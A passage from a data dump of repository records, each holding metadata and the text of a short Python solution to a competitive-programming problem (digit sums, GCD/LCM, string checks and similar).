"dff5c64f1ff0a1f7ae5c87dd33b1319b276270a4", "content_id": "c2df889c8381790eec36074d357b19296b72f637", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 202, "license_type": "no_license", "max_line_length": 41, "num_lines": 8, "path": "/TWEED.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,s=input().split()\n n=int(n)\n a = [int(i) for i in input().split()]\n if n==1 and s=='Dee' and a[0]%2==0:\n print(\"Dee\")\n else:\n print(\"Dum\")\n\n" }, { "alpha_fraction": 0.31698113679885864, "alphanum_fraction": 0.3396226465702057, "avg_line_length": 16.33333396911621, "blob_id": "0b29277af92b068e0a91b19b99a98ea23238c7c9", "content_id": "8a019bf7b7163383a54f51ce8b1a41cd1e7f57ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 29, "num_lines": 15, "path": "/COLOR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n r=0\n g=0\n b=0\n for i in range(len(s)):\n if(s[i]=='R'):\n r+=1\n elif(s[i]=='G'):\n g+=1\n else:\n b+=1\n m=max(r,g,b)\n print(n-m)\n \n" }, { "alpha_fraction": 0.29556649923324585, "alphanum_fraction": 0.32019704580307007, "avg_line_length": 18.095237731933594, "blob_id": "3b3c5a4d4e3366b6fd7d92e6827071add3eb16e7", "content_id": "0321c34c472961e45b102304db98ff3c863257ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 406, "license_type": "no_license", "max_line_length": 29, "num_lines": 21, "path": "/HEADBOB.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=int(input())\n c=0\n s=input()\n for i in s:\n if(i=='I'):\n c=1\n break\n elif(i=='Y'):\n c=2\n else:\n if(c==2 or c==1):\n c=2\n else:\n c=3\n if(c==1):\n print(\"INDIAN\")\n if(c==2):\n print(\"NOT INDIAN\")\n if(c==3):\n print(\"NOT SURE\")\n \n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 21.5, "blob_id": "b94ab0a00dfa60b955d1cb540cafc1375bd99d33", "content_id": "6e50f65defe0b1476b25dc0aa28f061ece9b0a75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/FSQRT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n print(int(math.sqrt(n)))\n" }, { "alpha_fraction": 0.44392523169517517, "alphanum_fraction": 0.4579439163208008, "avg_line_length": 25.75, "blob_id": "d4ba466b01623845595dcd3be3ceedb58dca3399", "content_id": "989f6f8809d56c75b23ccd014336e3e99642884f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 214, "license_type": "no_license", "max_line_length": 43, "num_lines": 8, "path": "/AVG.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k,v=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n x=(v*(n+k))-sum(a)\n if (x%k==0 and x/k>0):\n print(x//k)\n else:\n print(\"-1\")\n" }, { "alpha_fraction": 0.4232558012008667, "alphanum_fraction": 0.4232558012008667, "avg_line_length": 20, "blob_id": "01e6075aa10184954ee06a02244a4d71af08c94f", "content_id": "b726cefb64480e7aa6d272d8a0c507f86f8609b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 215, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/CFRTEST.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n d=[int(i) for i in input().split()]\n a=[]\n for i in d:\n if i in a:\n continue\n else:\n a.append(i)\n print(len(a))\n \n" }, { "alpha_fraction": 0.36567163467407227, "alphanum_fraction": 0.38805970549583435, "avg_line_length": 17.5, "blob_id": "2314dd7481daf6e3d664fc4846598da50e9b2c6f", "content_id": "685cfc295ed517548dd624e797fe005570e32e19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/FLOW018.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=1\n n=int(input())\n for i in range(1,n+1):\n s=s*i\n print(s) \n \n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5230769515037537, "avg_line_length": 15.25, "blob_id": "ecb87956936e95fd24a0486ff6e325819d1660b3", "content_id": "7217a8fcd5f7b0e82b9b8ee8e96e7bbffd5fa686", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 35, "num_lines": 8, "path": "/MAXREM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=int(input())\na=[int(i) for i in input().split()]\nb=list(set(a))\nif(len(b)==1):\n print(0)\nelse:\n b.sort()\n print(b[-2])\n" }, { "alpha_fraction": 0.2904483377933502, "alphanum_fraction": 0.3333333432674408, "avg_line_length": 17.814815521240234, "blob_id": "3cc62454fde60a66c6168e258b787a9d112d0fe1", "content_id": "2bcb5bd00e2809a2d3b54695519779ada06acde0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 513, "license_type": "no_license", "max_line_length": 44, "num_lines": 27, "path": "/CRDGAME.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n ch=0 \n mt=0 \n for j in range(0,n):\n a,b=map(int,input().strip().split())\n m=0 \n n=0 \n while a>0:\n m+= a%10\n a=a//10\n while b>0:\n n+=b%10\n b=b//10\n if m>n:\n ch+=1 \n elif m<n:\n mt+=1 \n else:\n ch+=1 \n mt+=1 \n if ch>mt:\n print(0,ch)\n elif ch<mt:\n print(1,mt)\n else:\n print(2,ch)\n \n" }, { "alpha_fraction": 0.5166666507720947, "alphanum_fraction": 0.5166666507720947, "avg_line_length": 29, "blob_id": "96d87d88bac6f98dcb17cd251bd5180cac803bb3", "content_id": "ed19139a7f39d4e400f9a75d8ad3c6962660c762", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 120, "license_type": "no_license", "max_line_length": 41, "num_lines": 4, "path": "/SALARY.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n = int(input())\n w = [int(i) for i in input().split()]\n print(sum(w)-n*min(w))\n" }, { "alpha_fraction": 0.45378151535987854, "alphanum_fraction": 0.47058823704719543, "avg_line_length": 28.125, "blob_id": "629c37c07886790a177f5af05bc24a15a69b1c27", "content_id": "6770517f417811b616510c892076c294f01a1c97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 238, "license_type": "no_license", "max_line_length": 50, "num_lines": 8, "path": "/NITIKA.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for t in range(int(input())):\n s=[str(i) for i in input().split()]\n n=len(s)-1\n for i in range(n):\n st=str(s[i][:1]).upper()\n print(st,end=\". \")\n st=str(s[n][:1]).upper()+str(s[n][1:]).lower()\n print(st)\n \n" }, { "alpha_fraction": 0.33557048439979553, "alphanum_fraction": 0.3557046949863434, "avg_line_length": 18.866666793823242, "blob_id": "521d1ceb4dab82e2595c565c72f28595a7e310df", "content_id": "f9d45f41808936209f2b846a1ad509e43521253a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/CHEFNWRK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n w=[int(i) for i in input().split()]\n p,s=1,0\n i=0\n while(i<n):\n s+=w[i]\n if(s>k):\n s=w[i]\n p+=1\n if(w[i]>k):\n p=-1\n break\n i+=1\n print(p)\n" }, { "alpha_fraction": 0.4536082446575165, "alphanum_fraction": 0.469072163105011, "avg_line_length": 20.55555534362793, "blob_id": "a3dcef3cf2bc476b29c3ad89343f90c69de089c0", "content_id": "194346dd7f82ab3e061e14ba38087d94d598f549", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 51, "num_lines": 9, "path": "/RRJOKE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n p=[]\n for i in range(n):\n p.append([int(i) for i in input().split()])\n s=0\n for i in range(1,n+1):\n s^=i\n print(s)\n" }, { "alpha_fraction": 0.4436090290546417, "alphanum_fraction": 0.4436090290546417, "avg_line_length": 25.600000381469727, "blob_id": "1d6e3a8faeb7261ed17eab87053bf838286e51d4", "content_id": "eebcdb004853ee1d3b2112095661841c8c834b10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 266, "license_type": "no_license", "max_line_length": 29, "num_lines": 10, "path": "/FLOW010.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n ch=input()\n if (ch==\"B\" or ch==\"b\"):\n print(\"BattleShip\")\n if (ch==\"C\" or ch==\"c\"):\n print(\"Cruiser\")\n if (ch==\"D\" or ch==\"d\"):\n print(\"Destroyer\")\n if (ch==\"F\" or ch==\"f\"):\n print(\"Frigate\")\n" }, { "alpha_fraction": 0.3206896483898163, "alphanum_fraction": 0.3379310369491577, "avg_line_length": 20.230770111083984, "blob_id": "79d25f55e3357ecfe0fff38d547c1b104af3a493", "content_id": "af45d86537fd886b4e842ac20837fd16827f2658", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 33, "num_lines": 13, "path": "/RECNDSTR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n if(len(s)==1 or len(s)==2):\n print(\"YES\")\n else:\n v=\"\"\n for i in range(2,len(s)):\n v+=s[i]\n v+=s[0]+s[1]\n if(v==s):\n print(\"YES\")\n else:\n print(\"NO\")\n \n \n" }, { "alpha_fraction": 0.37272727489471436, "alphanum_fraction": 0.3909091055393219, "avg_line_length": 21, "blob_id": "d7639144d0b816f11e2c11c6b4ea26120dc2b1f3", "content_id": "565f26e5a9920906f1740c49135a5e154971e2b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/CLLCM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n for i in a:\n if(i%2==0):\n print(\"NO\")\n n=-1\n break\n if(n!=-1):\n print(\"YES\")\n" }, { "alpha_fraction": 0.3722222149372101, "alphanum_fraction": 0.4027777910232544, "avg_line_length": 24.35714340209961, "blob_id": "caa7d320989e73cb1bd0b81e22e01b5afc458a2e", "content_id": "e175bf55aaee2d4b792e89bc37ef586cb17352e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 360, "license_type": "no_license", "max_line_length": 47, "num_lines": 14, "path": "/PPATTERN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[[0 for i in range(n)] for j in range(n)]\n k = 1\n for i in range(1,n+1):\n for j in range(i):\n a[j][i-1-j] = str(k)\n k+=1\n for i in range(n-1,0,-1):\n for j in range(i):\n a[n-i+j][n-1-j]= str(k)\n k+=1\n for i in a:\n print(*i)\n \n" }, { "alpha_fraction": 0.40760868787765503, "alphanum_fraction": 0.42391303181648254, "avg_line_length": 17.399999618530273, "blob_id": "8cb540af97d1fa9a3fda65f0d161322eb2e44603", "content_id": "323357e60f9cd0f95b109d056bf8e2d8871071f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 184, "license_type": "no_license", "max_line_length": 43, "num_lines": 10, "path": "/FRUITS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,m,k=[int(i) for i in input().split()]\n diff=0\n if n<m:\n m,n=n,m\n m+=k\n if(n-m<=0):\n print(0)\n else:\n print(n-m)\n" }, { "alpha_fraction": 0.4309392273426056, "alphanum_fraction": 0.4364641010761261, "avg_line_length": 24.14285659790039, "blob_id": "f950ccc67fb082ec03fe031dec4f21f08d47993e", "content_id": "76776bbdfa3b0a2ca335cb2d9d613be5dd3bb757", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 39, "num_lines": 7, "path": "/FLOW017.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=[int(i) for i in input().split()]\n x=min(a)\n y=max(a)\n for i in range(3):\n if(a[i]!=x and a[i]!=y):\n print(a[i])\n \n" }, { "alpha_fraction": 0.30649352073669434, "alphanum_fraction": 0.33246752619743347, "avg_line_length": 23.0625, "blob_id": "f07d5630a906ebf2cab993f7d4db9dc78c8ce412", "content_id": "777092657345af67822473133e315dcb0eb0a531", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 385, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/TEMPLELA.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=[int(i) for i in input().split()]\n if(n%2==0):\n print(\"no\")\n else:\n k=1\n for i in range((n//2)+1):\n if(s[i]==s[n-i-1] and s[i]==k):\n k+=1\n else:\n print(\"no\")\n k=-1\n break\n if(k==(n//2)+2):\n print(\"yes\")\n" }, { "alpha_fraction": 0.34224599599838257, "alphanum_fraction": 0.3957219123840332, "avg_line_length": 17.700000762939453, "blob_id": "91b76258a3f484186323fba7b0c265d28a308d33", "content_id": "3701b8653d152369701f4c33d9ca202298e0cb04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 374, "license_type": "no_license", "max_line_length": 35, "num_lines": 20, "path": "/CHEFWORK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=int(input())\nc=[int(i) for i in input().split()]\nt=[int(i) for i in input().split()]\np=100001\nx,y=100001,100001\nfor i in range(n):\n if(t[i]==3):\n if(c[i]<p):\n p=c[i]\n else:\n if(t[i]==1):\n if(c[i]<x):\n x=c[i]\n else:\n if(c[i]<y):\n y=c[i]\nif(p<=x+y):\n print(p)\nelse:\n print(x+y)\n" }, { "alpha_fraction": 0.45588234066963196, "alphanum_fraction": 0.5073529481887817, "avg_line_length": 12.600000381469727, "blob_id": "5f0fb229dd6d28a46ec182dbb2e0eec04c3591d5", "content_id": "9c5999614bb6cdedc5acb96c9ce0499de08ac885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 136, "license_type": "no_license", "max_line_length": 31, "num_lines": 10, "path": "/HOWMANY.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=input()\na=len(n)\nif(a==1):\n print(\"1\")\nelif(a==2):\n print(\"2\")\nelif(a==3):\n print(\"3\")\nelse:\n print(\"More than 3 digits\")\n" }, { "alpha_fraction": 0.3400000035762787, "alphanum_fraction": 0.375, "avg_line_length": 17.18181800842285, "blob_id": "c1b38a3155fc58aa71b2269c3646719abe6d9683", "content_id": "23191f8f5923de513b8b3af4d1ec4f708780f945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 41, "num_lines": 11, "path": "/CHFMOT18.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s,n=[int(i) for i in input().split()]\n p=0\n if(s==1 or s%2!=0):\n p=1\n s-=1\n while(s>=2):\n p+=s//n\n s%=n\n n=s\n print(p)\n" }, { "alpha_fraction": 0.3316326439380646, "alphanum_fraction": 0.3443877696990967, "avg_line_length": 25.133333206176758, "blob_id": "a293b8321d16f43cee2666e2712ffb4f39521e02", "content_id": "ec115efa18cf4c00bafd04f1c0e9ed361c55b9a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/POPGATES.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n a=[i for i in input().split()]\n for i in range(n-1,n-k-1,-1):\n if(a[i]=='H'):\n for j in range(i):\n if(a[j]=='H'):\n a[j]='T'\n else:\n a[j]='H'\n c=0\n for i in range(n-k):\n if(a[i]=='H'):\n c+=1\n print(c)\n" }, { "alpha_fraction": 0.3232323229312897, "alphanum_fraction": 0.40909090638160706, "avg_line_length": 18.299999237060547, "blob_id": "20ba63892670f781ed3dd008edbd7597cff6e350", "content_id": "e8d119437152933519664484ba0973ebd257fc3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 41, "num_lines": 10, "path": "/MATCHES.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "s=[6,2,5,5,4,5,6,3,7,6]\nfor _ in range(int(input())):\n a,b=[int(i) for i in input().split()]\n n=a+b\n p,d=0,0\n while(n>0):\n d=n%10\n p+=s[d]\n n//=10\n print(p)\n \n" }, { "alpha_fraction": 0.3195592164993286, "alphanum_fraction": 0.35537189245224, "avg_line_length": 20.352941513061523, "blob_id": "3902e5361a7ed4d6e73adbdabf0f5e5d50e4ab4d", "content_id": "5fb04ffcc0d1555e5fc87ae194b3ad44d5d86aba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 50, "num_lines": 17, "path": "/SPELLBOB.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=input()\n b=input()\n c=[0,0,0]\n bc=0\n oc=0\n for i in range(3):\n if(a[i]=='b' or b[i]=='b'):\n bc+=1\n c[i]+=1\n if(a[i]=='o' or b[i]=='o'):\n oc+=1\n c[i]+=1\n if all(i>=1 for i in c) and (bc>=2 and oc>=1):\n print(\"yes\")\n else:\n print(\"no\")\n" }, { "alpha_fraction": 0.3352601230144501, "alphanum_fraction": 0.3757225573062897, "avg_line_length": 18.22222137451172, "blob_id": "3099bba1e5717ef5037e3862ac5ae1f3eeffa50c", "content_id": "86f26bda64f213f75a12bc9aea6c70a928304aa1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 29, "num_lines": 9, "path": "/TRISQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n b = int(input())\n if b<4:\n print(0)\n continue\n else:\n if b%2==1:\n b-=1\n print(((b-2)*(b))//8)\n" }, { "alpha_fraction": 0.30214425921440125, "alphanum_fraction": 0.32943469285964966, "avg_line_length": 23.428571701049805, "blob_id": "b0cd148c7c31092564c669b822bd02d1730befd2", "content_id": "bcc9d81e49c852bba0bfa3d8ac4ac76c7438558f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 513, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/PIPSQUIK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,h,y1,y2,l=[int(i) for i in input().split()]\n t=[0]*n\n x=[0]*n\n for i in range(n):\n t[i],x[i]=[int(i) for i in input().split()]\n if(n<l):\n print(n)\n else:\n k=0\n for i in range(n):\n if (t[i]==1 and (h-y1)<=x[i]):\n k+=1\n elif (t[i]==2 and y2>=x[i]):\n k+=1\n else:\n l-=1\n if(l==0):\n break\n k+=1\n print(k)\n" }, { "alpha_fraction": 0.28409090638160706, "alphanum_fraction": 0.3011363744735718, "avg_line_length": 21.133333206176758, "blob_id": "f8f52935902049d42552ccb3bdff46f5022bd8cd", "content_id": "b348a65a41a0c7f7b7b9ff80ffea29bc6cad8867", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/CANDY123.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a,b=[int(i) for i in input().split()]\n x,y,i=0,0,1\n while(True):\n if(i%2==0):\n y+=i\n if(y>b):\n print(\"Limak\")\n break\n else:\n x+=i\n if(x>a):\n print(\"Bob\")\n break\n i+=1\n \n \n \n" }, { "alpha_fraction": 0.3730158805847168, "alphanum_fraction": 0.3849206268787384, "avg_line_length": 21.909090042114258, "blob_id": "d384839843798199a90e566a0c723bdf80ee24c5", "content_id": "e188c08b4e7b0ba6a7a7574212b5d14ccc2f3758", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": "no_license", "max_line_length": 41, "num_lines": 11, "path": "/ATM2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n s=\"\"\n for i in range(n):\n if(k-a[i]>=0):\n k-=a[i]\n s+=\"1\"\n else:\n s+=\"0\"\n print(s)\n" }, { "alpha_fraction": 0.38591548800468445, "alphanum_fraction": 0.4169014096260071, "avg_line_length": 22.33333396911621, "blob_id": "e491a14dfaba85bfc388cc8c4d4973facfab2797", "content_id": "a8c02af573e92d71ca5f57b1445bf87079098c1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/TOWIN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n if(n==1):\n print(\"first\")\n else:\n a.sort(reverse=True)\n p1=a[1]+sum(a[2::2])\n p2=sum(a)-p1\n if(p1<p2):\n print(\"first\")\n elif(p1>p2):\n print(\"second\")\n else:\n print(\"draw\")\n \n" }, { "alpha_fraction": 0.5204081535339355, "alphanum_fraction": 0.5306122303009033, "avg_line_length": 13, "blob_id": "3d852d503d8a74af3d54e1d7ac4368649e917146", "content_id": "6710da5ebb60c7251584adc660d07ad9e76f2e38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 21, "num_lines": 7, "path": "/TSORT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=int(input())\na=[0]*n\nfor i in range(n):\n a[i]=int(input())\na.sort()\nfor i in a:\n print(i)\n" }, { "alpha_fraction": 0.350943386554718, "alphanum_fraction": 0.40377357602119446, "avg_line_length": 25.5, "blob_id": "ffcac78b9c3a65555aa690a653c895dd33512d5b", "content_id": "7481d1507cb1cd5ac9e1053720f0a49dac6513c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 55, "num_lines": 10, "path": "/CHEFSTLT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s1=input()\n s2=input()\n mn,mx=0,len(s1)\n for i in range(len(s1)):\n if(s1[i]==s2[i] and s1[i]!='?'):\n mx-=1\n if(s1[i]!=s2[i] and s1[i]!='?' and s2[i]!='?'):\n mn+=1 \n print(mn,mx)\n" }, { "alpha_fraction": 0.4873417615890503, "alphanum_fraction": 0.49367088079452515, "avg_line_length": 18.75, "blob_id": "d35bb35b0faa69ef573bfe2ae6da7eaf4d4999c5", "content_id": "b4f4452f8f10967e9df62c5fd498d213e06d1ef8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/FANCY.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input().split()\n i=\"not\"\n k=0\n if i in s:\n print(\"Real Fancy\")\n else:\n print(\"regularly fancy\")\n" }, { "alpha_fraction": 0.349152535200119, "alphanum_fraction": 0.3694915175437927, "avg_line_length": 18.66666603088379, "blob_id": "7335c674baa2c28b0215714e058e8d29c6bb8eb2", "content_id": "e456e80bc77d1e547e02e3825901629356916119", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 29, "num_lines": 15, "path": "/CHEALG.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n st=\"\"\n c=1\n for i in range(len(s)-1):\n if(s[i]==s[i+1]):\n c+=1\n else:\n st+=s[i]+str(c)\n c=1\n st+=s[len(s)-1]+str(c)\n if(len(st)<len(s)):\n print(\"YES\")\n else:\n print(\"NO\")\n" }, { "alpha_fraction": 0.47345131635665894, "alphanum_fraction": 0.48672565817832947, "avg_line_length": 21.600000381469727, "blob_id": "7ca6b99ee7d004964af4f228eac6fc734a197ad1", "content_id": "68f243ddf868fa639930bcd6d1ca39281c92c704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/RECIPE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n p=[int(i) for i in input().split()]\n n=p.pop(0)\n a=p[0]\n for i in range(1,n):\n a=math.gcd(a,p[i])\n for i in range(n):\n print(p[i]//a,end=\" \")\n print()\n" }, { "alpha_fraction": 0.38686132431030273, "alphanum_fraction": 0.43065693974494934, "avg_line_length": 17.85714340209961, "blob_id": "996a9039dbbef12a7fa538849527ebf70e2a2051", "content_id": "7ee30a68842333ce77549807f27d285e789ebc85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 137, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/FLOW006.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=int(input())\n s=0\n while(a>0):\n s+=int(a%10)\n a=int(a/10)\n print(int(s))\n \n" }, { "alpha_fraction": 0.35093167424201965, "alphanum_fraction": 0.39751553535461426, "avg_line_length": 20.46666717529297, "blob_id": "8648c2e84af60785f7547f1229e230a580aa55cc", "content_id": "cd243095ce3e9fd492e1994baae9fe5dac796af6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 43, "num_lines": 15, "path": "/COPS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n m,x,y=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n d=x*y\n s=[0]*100\n for i in a:\n p=i-d\n q=i+d\n if p<1:\n p=1\n if q>100:\n q=100\n for j in range(p-1,q):\n s[j]=1\n print(s.count(0))\n" }, { "alpha_fraction": 0.402402400970459, "alphanum_fraction": 0.41741740703582764, "avg_line_length": 16.526315689086914, "blob_id": "aa1702b2e166bb3c630a2915e1ac297271e296fc", "content_id": "8a6e44a5cd7c98a1604b5661097d1f7ca875f837", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 333, "license_type": "no_license", "max_line_length": 45, "num_lines": 19, "path": "/HMAPPY2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def gcd(a,b):\n while b > 0:\n a, b = b, a % b\n return a\n \ndef lcm(a, b):\n return a * b / gcd(a, b)\n\nfor _ in range(int(input())):\n n,a,b,k=[int(i) for i in input().split()]\n x,y,z=0,0,0\n p=lcm(a,b)\n x=n//a\n y=n//b\n z=n//p\n if(x+y-(2*z)>=k):\n print(\"Win\")\n else:\n print(\"Lose\")\n" }, { "alpha_fraction": 0.4113207459449768, "alphanum_fraction": 0.43018868565559387, "avg_line_length": 25.5, "blob_id": "7b2744e8100cc7ecf0796eb57782b1904ef6954c", "content_id": "42a620f9d4a88621419d23021d5daff0dcbb4e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 45, "num_lines": 10, "path": "/MAGICHF.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,x,s=[int(i) for i in input().split()]\n a=[0]*(n+1)\n a[x]=1\n for j in range(s):\n p,q=[int(i) for i in input().split()]\n a[p],a[q]=a[q],a[p]\n for i in range(n+1):\n if(a[i]==1):\n print(i)\n" }, { "alpha_fraction": 0.5376344323158264, "alphanum_fraction": 0.5376344323158264, "avg_line_length": 30, "blob_id": "2f1ec5376c9c5119071c62c73426a2ccb37375a6", "content_id": "8fa8bf6b9019835cc578e0f05a1f031e7a284cb1", "detected_licenses": [], "is_generated": 